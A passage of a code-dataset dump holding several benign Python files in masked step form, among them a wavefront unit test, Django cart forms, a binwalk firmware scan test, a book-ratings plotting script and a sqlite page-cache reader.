self.wepCmpt.setRotAng(rotAngInDeg)\n\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n\n sensorNameList = [\"R22_S11\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n\n fakeFlatDirName = \"fake_flats\"\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n\n detector = \" \".join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n\n currWorkDir = os.getcwd()\n\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n\n command = \"makeGainImages.py\"\n argstring = \"--detector_list %s\" % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n\n return len([name for name in os.listdir(folder) \n if os.path.isfile(os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, \"\")\n\n def testSetSkyFile(self):\n\n skyFile = \"testSetSkyFile\"\n self.wepCmpt.setSkyFile(skyFile)\n\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n\n # Make the calibration products and do the ingestion\n sensorNameList = [\"R22_S11\", \"R22_S12\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n # Set the skyFile\n repackagedDir = os.path.join(getModulePath(), \"tests\", \"testData\",\n \"comcamRepackagedData\")\n skyFilePath = os.path.join(repackagedDir, \"skyComCamInfo.txt\")\n self.wepCmpt.setSkyFile(skyFilePath)\n\n # Collect the wavefront data\n 
intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, \"intra\")\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, \"extra\")\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n\n # Calculate the wavefront error\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == \"__main__\":\n\n # Run the unit test\n unittest.main()\n",
"step-ids": [
9,
14,
16,
22,
23
]
}
|
[
9,
14,
16,
22,
23
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def check_bit4(input):
mas = 8
desired = input & mas
if desired > 0:
return 'om'
else:
return 'off'
<|reserved_special_token_1|>
def check_bit4(input):
mas=0b1000
desired=input & mas
if desired>0:
return "om"
else :
return "off"
|
flexible
|
{
"blob_id": "29dc940292a6805aabfa5bed22bb75d31140c83f",
"index": 3257,
"step-1": "<mask token>\n",
"step-2": "def check_bit4(input):\n mas = 8\n desired = input & mas\n if desired > 0:\n return 'om'\n else:\n return 'off'\n",
"step-3": "def check_bit4(input):\n\tmas=0b1000\n\tdesired=input & mas\n\tif desired>0:\n\t\treturn \"om\"\n\telse :\n\t\treturn \"off\"\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django import forms
class RemoveProdutoDoCarrinhoForm(forms.Form):
class Meta:
fields = ('produto_id')
produto_id = forms.CharField(widget=forms.HiddenInput())
class QuantidadeForm(forms.Form):
class Meta:
fields = ('quantidade', 'produto_id')
# <input type="hidden" name="produto_id" id="id_produto_id" value="xxx">
produto_id = forms.CharField(widget=forms.HiddenInput())
quantidade = forms.IntegerField(
min_value=1,
max_value=1000,
error_messages={'required': 'Campo obrigatório.', },
widget=forms.TextInput(attrs={'class': 'form-control form-control-sm quantidade',
'maxlength': '20',
'onkeypress': 'return event.charCode >= 48 && event.charCode <= 57'}),
required=True)
|
normal
|
{
"blob_id": "fd5fca0e9abbb669ddff4d676147acc4344cdd1c",
"index": 509,
"step-1": "<mask token>\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-2": "<mask token>\n\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n\n\n class Meta:\n fields = 'produto_id'\n <mask token>\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-3": "<mask token>\n\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n\n\n class Meta:\n fields = 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-4": "from django import forms\n\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n\n\n class Meta:\n fields = 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-5": "from django import forms\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n class Meta:\n fields = ('produto_id')\n\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\nclass QuantidadeForm(forms.Form):\n class Meta:\n fields = ('quantidade', 'produto_id')\n\n # <input type=\"hidden\" name=\"produto_id\" id=\"id_produto_id\" value=\"xxx\">\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\n quantidade = forms.IntegerField(\n min_value=1,\n max_value=1000,\n error_messages={'required': 'Campo obrigatório.', },\n widget=forms.TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20',\n 'onkeypress': 'return event.charCode >= 48 && event.charCode <= 57'}),\n required=True)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from os.path import dirname
import binwalk
from nose.tools import eq_, ok_
def test_firmware_squashfs():
'''
Test: Open hello-world.srec, scan for signatures
verify that only one signature is returned
verify that the only signature returned is Motorola S-rec data-signature
'''
expected_results = [
[0, 'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'],
[112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],
[1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],
[1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],
]
scan_result = binwalk.scan(
dirname(__file__) + '/input-vectors/firmware.squashfs',
signature=True,
quiet=True,
extract=True) # Throws a warning for missing external extractor
# Test number of modules used
eq_(len(scan_result), 1)
# Test number of results for that module
eq_(len(scan_result[0].results), len(expected_results))
# Test result-description
for i in range(0, len(scan_result[0].results)):
eq_(scan_result[0].results[i].offset, expected_results[i][0])
eq_(scan_result[0].results[i].description, expected_results[i][1])
|
normal
|
{
"blob_id": "d55043c2a18b935478d9be442aaf7305231edc7d",
"index": 5828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-3": "from os.path import dirname\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-4": "from os.path import dirname\n\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n '''\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n '''\n expected_results = [\n [0, 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'],\n [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],\n [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],\n [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],\n ]\n\n scan_result = binwalk.scan(\n dirname(__file__) + '/input-vectors/firmware.squashfs',\n signature=True,\n quiet=True,\n extract=True) # Throws a warning for missing external extractor\n # Test number of modules used\n eq_(len(scan_result), 1)\n # Test number of results for that module\n eq_(len(scan_result[0].results), len(expected_results))\n # Test result-description\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Created by Yuexiong Ding
# Date: 2018/9/4
# Description:
|
normal
|
{
"blob_id": "ddb139fa3fbfa1218459e3865150465a44a03bea",
"index": 6306,
"step-1": "# Created by Yuexiong Ding\n# Date: 2018/9/4\n# Description: \n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
<|reserved_special_token_0|>
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == '__main__':
get_ratings(file_path='BX-Book-Ratings.csv')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == '__main__':
get_ratings(file_path='BX-Book-Ratings.csv')
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == '__main__':
get_ratings(file_path='BX-Book-Ratings.csv')
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
# 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码
ratings = pd.read_table(file_path, header=0,
sep=';', encoding='ISO-8859-1')
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(
min(ratings['Book-Rating']), ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == "__main__":
get_ratings(file_path='BX-Book-Ratings.csv')
|
flexible
|
{
"blob_id": "be5178f013e639d5179ed1af380dd7a63044bff2",
"index": 5636,
"step-1": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-3": "<mask token>\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-5": "import pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n # 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码\n ratings = pd.read_table(file_path, header=0,\n sep=';', encoding='ISO-8859-1')\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(\n min(ratings['Book-Rating']), ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == \"__main__\":\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main() ->None:
try:
command = sys.argv[0]
args = sys.argv[1:]
cli.main(command, args)
except KeyboardInterrupt:
pass
<|reserved_special_token_1|>
import sys
from . import cli
def main() ->None:
try:
command = sys.argv[0]
args = sys.argv[1:]
cli.main(command, args)
except KeyboardInterrupt:
pass
|
flexible
|
{
"blob_id": "9969dcf820a5ff34b483593cd43e4dfba9588ed2",
"index": 4348,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-3": "import sys\nfrom . import cli\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.
HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.
HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dnscache', default='dnscache.sqld', help=
'IP address cache default: %(default)s')
parser.add_argument('--download', default='pages.sqld', help=
'Here is where the downloaded pages go: %(default)s')
parser.add_argument('--r404', default='404.sqld', help=
'Here is where we remember pages that gave 404 etc: %(default)s')
args = parser.parse_args()
result_store = SqliteDict(args.download, encode=gz_encode, decode=
gz_decode, autocommit=True)
for url, cont in result_store.items():
print(url, cont[:30])
r404 = SqliteDict(args.r404, autocommit=True)
for url, status in r404.items():
print(url, status)
<|reserved_special_token_1|>
from sqlitedict import SqliteDict
import sys
import socket
import urllib
import argparse
import zlib, pickle, sqlite3
import random
from datetime import datetime
import time
from urllib.parse import urlparse
import hashlib
import subprocess
import requests
from multiprocessing import Pool
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.
HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dnscache', default='dnscache.sqld', help=
'IP address cache default: %(default)s')
parser.add_argument('--download', default='pages.sqld', help=
'Here is where the downloaded pages go: %(default)s')
parser.add_argument('--r404', default='404.sqld', help=
'Here is where we remember pages that gave 404 etc: %(default)s')
args = parser.parse_args()
result_store = SqliteDict(args.download, encode=gz_encode, decode=
gz_decode, autocommit=True)
for url, cont in result_store.items():
print(url, cont[:30])
r404 = SqliteDict(args.r404, autocommit=True)
for url, status in r404.items():
print(url, status)
<|reserved_special_token_1|>
from sqlitedict import SqliteDict
import sys
import socket
import urllib
import argparse
import zlib, pickle, sqlite3
import random
from datetime import datetime
import time
from urllib.parse import urlparse
import hashlib
import subprocess
import requests
from multiprocessing import Pool
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--dnscache', default="dnscache.sqld", help='IP address cache default: %(default)s')
parser.add_argument('--download', default="pages.sqld", help='Here is where the downloaded pages go: %(default)s')
parser.add_argument('--r404', default="404.sqld", help='Here is where we remember pages that gave 404 etc: %(default)s')
args = parser.parse_args()
#2) Results setup
result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)
for url,cont in result_store.items():
print(url,cont[:30])
#3) 404 setup
r404 = SqliteDict(args.r404, autocommit=True)
for url,status in r404.items():
print(url,status)
|
flexible
|
{
"blob_id": "295d6a66335491b406f47212064da9fd5fca6eb6",
"index": 6812,
"step-1": "<mask token>\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-4": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-5": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default=\"dnscache.sqld\", help='IP address cache default: %(default)s')\n parser.add_argument('--download', default=\"pages.sqld\", help='Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default=\"404.sqld\", help='Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n\n #2) Results setup\n result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)\n\n for url,cont in result_store.items():\n print(url,cont[:30])\n \n #3) 404 setup\n r404 = SqliteDict(args.r404, autocommit=True)\n for url,status in r404.items():\n print(url,status)\n \n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
